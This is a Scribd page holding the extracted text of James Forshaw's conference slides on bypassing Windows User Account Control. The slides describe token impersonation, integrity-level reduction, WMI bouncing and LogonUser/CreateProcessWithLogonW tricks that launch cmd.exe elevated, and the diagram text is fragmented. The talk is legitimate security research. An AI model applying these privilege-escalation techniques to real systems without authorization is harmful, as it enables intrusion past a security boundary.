Scribd Logo
Hochladen

Willkommen bei Scribd!

  • ZN17 James Forshaw Bypassing UAC

    Hochgeladen von

    gnarly tired
    93 Ansichten54 Seiten
    The document discusses vulnerabilities in User Account Control (UAC) on Windows systems that can allow bypassing of UAC protections. It describes how UAC works at an architectural level and how access tokens are used and linked between limited and elevated sessions. It then explains different techniques like token stealing, impersonation, and reduced integrity levels that can allow escalating privileges without triggering UAC prompts. The document aims to demonstrate that both types of UAC (admin approval and over-the-shoulder) have vulnerabilities and can be bypassed to gain elevated access on a system.

    Originalbeschreibung:

    zn

    Copyright

    © © All Rights Reserved

    Verfügbare Formate

    PDF, TXT oder online auf Scribd lesen

    Stufen Sie dieses Dokument als nützlich ein?

    Sind diese Inhalte unangemessen?

    Dieses Dokument melden
    The document discusses vulnerabilities in User Account Control (UAC) on Windows systems that can allow bypassing of UAC protections. It describes how UAC works at an architectural level and how access tokens are used and linked between limited and elevated sessions. It then explains different techniques like token stealing, impersonation, and reduced integrity levels that can allow escalating privileges without triggering UAC prompts. The document aims to demonstrate that both types of UAC (admin approval and over-the-shoulder) have vulnerabilities and can be bypassed to gain elevated access on a system.

    Copyright:

    © All Rights Reserved
    Als PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    93 Ansichten54 Seiten

    ZN17 James Forshaw Bypassing UAC

    Hochgeladen von

    gnarly tired
    The document discusses vulnerabilities in User Account Control (UAC) on Windows systems that can allow bypassing of UAC protections. It describes how UAC works at an architectural level and how access tokens are used and linked between limited and elevated sessions. It then explains different techniques like token stealing, impersonation, and reduced integrity levels that can allow escalating privileges without triggering UAC prompts. The document aims to demonstrate that both types of UAC (admin approval and over-the-shoulder) have vulnerabilities and can be bypassed to gain elevated access on a system.

    Copyright:

    © All Rights Reserved
    Als PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    von 54

    Reading your way

    around UAC
    Abusing Access Tokens for UAC Bypasses

    James Forshaw @tiraniddo


    What I’m Going to Talk About
    ● Why Admin-Approval UAC is even worse than you thought!
    ● Why Over-the-Shoulder UAC is still worse than you thought!
    UAC Architecture
    AppInfo Service
    Limited User Logon Session Elevated User Logon Session
    Authentication-ID = A-B RPC Authentication-ID = X-Y

    Application
    UAC Architecture
    AppInfo Service
    Limited User Logon Session Elevated User Logon Session
    Authentication-ID = A-B RPC Authentication-ID = X-Y

    Application
    ShellExecute “runas”
    UAC Architecture
    AppInfo Service
    Limited User Logon Session Elevated User Logon Session
    Authentication-ID = A-B RPC Authentication-ID = X-Y

    Application
    ShellExecute “runas”

    consent.exe
    UAC Architecture
    AppInfo Service
    Limited User Logon Session Elevated User Logon Session
    Authentication-ID = A-B RPC Authentication-ID = X-Y

    Application
    ShellExecute “runas”

    Application
    Linked Tokens
    Linked Tokens
    Deny-Only Groups

    Link
    Also Fewer Privileges

    Link
    The Problem with UAC

    Limited User Logon Session Elevated User Logon Session


    Authentication-ID = A-B Current User Authentication-ID = X-Y
    Registry Hive

    User Profile
    Non-Admin Directory Admin
    Application Application

    Desktop and
    Kernel Objects
    The Problem with UAC

    Limited User Logon Session Elevated User Logon Session


    Authentication-ID = A-B Current User Authentication-ID = X-Y
    Registry Hive

    User Profile
    Non-Admin Directory Admin
    Application Application

    Desktop and
    Kernel Objects
    Kernel Object Login Sid

    Non-Admin Token
    Groups

    Admin Token DACL


    NtUserGetClipboardToken
    Kernel

    Win32k

    rd
    oab
    C lip Captured
    to
    Token
    ite
    Wr

    UAC Admin Non-Admin


    Process Process
    NtUserGetClipboardToken
    Kernel

    Win32k

    Nt
    Us
    erG
    etC
    Captured

    lip
    bo
    Token

    ard
    To
    ke
    n
    UAC Admin Non-Admin
    Process Process
    NtUserGetClipboardToken
    Kernel

    Win32k

    Captured
    Token

    Op
    en
    edf
    or
    rea
    d
    UAC Admin Non-Admin
    Process Process
    Clipboard Token

    Read-only access
    Creating a New Process
    Parent Token Sibling Token
    Process
    Token

    Token ID Process Assigned


    OR Token Equal
    Token
    Parent Parent
    Equal
    Token ID Token ID
    Equal
    Parent
    Auth ID Auth ID
    Token ID
    Assigned
    Token
    Creating a New Process
    Parent Token Sibling Token
    Process
    Token

    Token ID Process Assigned


    OR Token Equal
    Token
    Parent Parent
    Equal
    Token ID Token ID
    Equal
    Parent
    Auth ID Auth ID
    Token ID
    Assigned
    Token
    Impersonating a Token
    Token Level Process has Process IL Process User
    == Impersonate >= ==
    Identification Privilege Token IL Token User

    Restrict to
    ALLOWED Identification
    Level
    Impersonating a Token
    Token Level Process has Process IL Process User
    == Impersonate >= ==
    Identification Privilege Token IL Token User

    Restrict to
    ALLOWED Identification
    Level
    Impersonating a Token
    Token Level Process has Process IL Process User
    == Impersonate >= ==
    Identification Privilege Token IL Token User

    Restrict to
    ALLOWED Identification
    Level
    Impersonating a Token
    Token Level Process has Process IL Process User
    == Impersonate < ==
    Identification Privilege Token IL Token User

    Restrict to
    ALLOWED Identification
    Level
    Reduce the Integrity Level
    Reduce the Integrity Level
    Impersonating a Token
    Token Level Process has Process IL Process User
    == Impersonate >= ==
    Identification Privilege Token IL Token User

    Restrict to
    ALLOWED Identification
    Level
    High IL != Administrator

    Create and modify files in system locations

    Create and modify system services

    Open >= high IL processes for R/W

    Interact with >= high IL Windows (UIPI)


    No “God” Privileges
    The following are not allowed to be enabled for a Medium IL token.
    Privilege Possible Privileged Operations
    SeCreateTokenPrivilege Create new token objects
    SeTcbPrivilege Many and varied privileged operations
    SeLoadDriverPrivilege Load a driver into the kernel
    SeDebugPrivilege Bypass process/thread security checks
    SeBackupPrivilege Bypass file/key security checks for read
    SeRestorePrivilege Bypass file/key security checks for write
    SeImpersonatePrivilege Impersonate arbitrary users
    Stealing Tokens
    OpenProcessToken

    We only have Query


    Limited Information
    Only Limited Information?
    Start an Elevated Process?

    Standard
    auto-elevation of
    specific MS binaries.
    Scheduled Tasks

    If set will spawn


    elevated process
    with no UAC prompt.
    DEMO
    Changes in Windows 10
    Capability Check
    Token Level Process has Process IL
    == Impersonate >=
    Identification Privilege Token IL
    Process User
    ==
    Token User

    Elevation Check

    Restrict to
    ALLOWED Identification
    Level
    Elevation Checks

    if (SeTokenIsElevated(ImpersonationToken)) {
    if (!SeTokenIsElevated(ProcessToken) ||
    ProcessToken->LogonSession->Flags.UacSession) {
    return STATUS_PRIVILEGE_NOT_HELD;
    }
    }
    // Continue with impersonation check.
    What Makes a Token
    Elevated?
    ● Has “God” privileges or certain elevated groups

    BOOLEAN RtlIsElevatedRid(SID_AND_ATTRIBUTES *sid_and_attr) {


    DWORD last_rid = GetLastRid(sid_and_attr->Sid);
    DWORD check_rids[] = { 512, 544, ... };
    for(int i = 0; i < countof(check_rids); ++i) {
    if (check_rids[i] == last_rid) {
    return TRUE;
    }
    }
    return FALSE; For example:
    } BUILTIN\Administrators == S-1-5-32-544
    Use NtFilterToken
    Use Non-God Privileges
    Privilege Possible Privileged Operations
    SeCreateGlobalPrivilege Create new sections in global BNO directory
    SeCreatePageFilePrivilege Create or modify page/hibernation files
    SeCreateSymbolicLinkPrivilege Create arbitrary NTFS symbolic links
    SeManageVolumePrivilege Mount/Unmount volumes including VHDs
    SeSecurityPrivilege Modify SACL entries
    SeSystemEnvironmentPrivilege Modify UEFI boot variables
    Bouncing to Elevated Session
    WMI
    Limited User Logon Session Elevated User Logon Session
    Win32_Process
    Authentication-ID = A-B Authentication-ID = X-Y
    Flags = UacSession Flags = None

    Application
    Impersonate Non-Admin
    Token
    Non-Admin
    Application
    Impersonate Admin Token
    DEMO
    LogonUser New Credentials
    LSASS
    Limited User Logon Session Elevated User Logon Session
    LogonUser
    Authentication-ID = A-B Authentication-ID = X-Y

    Application
    // Clone token with new credentials.
    Impersonate LogonUser("Badger",
    Non-Elevated Token "Badger",
    "Badger",
    LOGON32_LOGON_NEW_CREDENTIALS,
    &Token);
    Admin Token

    Elevated Token
    Abuse Secondary Logon

    ImpersonateLoggedOnUser(hNonElevatedToken);

    CreateProcessWithLogonW(
    "Badger", "Badger", "Badger",
    Equivalent to
    LOGON_NETCREDENTIALS_ONLY LOGON32_LOGON_NEW_CREDENTIALS

    NULL, L"cmd.exe", &proc_info);


    DEMO
    Over-The-Shoulder Elevation
    Separation of Resources

    Normal User Logon Session Normal User Admin User Elevated User Logon Session
    Authentication-ID = A-B Registry Hive Registry Hive Authentication-ID = X-Y

    User Profile Admin Profile


    Directory Directory
    Non-Admin Admin
    Application Application
    Desktop and
    Kernel Objects
    Impersonating an OTS Token
    Token Level Process has Process IL Process User
    == Impersonate >= ==
    Identification Privilege Token IL Token User

    Restrict to
    ALLOWED Identification
    Level
    Impersonating an OTS Token
    Token Level Process has Process IL Capability Check
    == Impersonate >=
    Identification Privilege Token IL
    Process User
    ==
    Token User

    Restrict to
    ALLOWED Identification
    Level
    Capability Check
    BOOLEAN SepIsImpersonationAllowedDueToCapability(PTOKEN token, PTOKEN imp_token) {
    if ((token->SessionId != imp_token->SessionId) ||
    (token->TokenFlags & TOKEN_FLAGS_LOWBOX) == 0) || Tokens must be in
    (imp_token->TokenFlags & TOKEN_FLAGS_LOWBOX) == 0)) { same Session and
    return FALSE; both be LowBox.
    }

    if (!SepSidInTokenSidHash(&token->CapabilitiesHash,
    SeConstrainedImpersonationCapabilitySid) ||
    !SepCheckCapabilities(token, imp_token->Capabilities) || Process token must have
    !RtlEqualSid(token->Package, imp_token->Package)) { impersonation capability,
    return FALSE; and be in same package.
    }

    return TRUE;
    }
    Enterprise Authentication
    DEMO
    Is Anything Safe?

    Hit CTRL+ALT+DEL
    and click
    Conclusions
    ● Admin-Approval UAC is broken
    ● Over-the-sholder UAC is pretty broken on Windows 10
    ● Best chance you have is fast-user switching
    ○ Don’t switch using Explorer, always use the secure attention sequence
    Thanks
    Any Questions?

    Das könnte Ihnen auch gefallen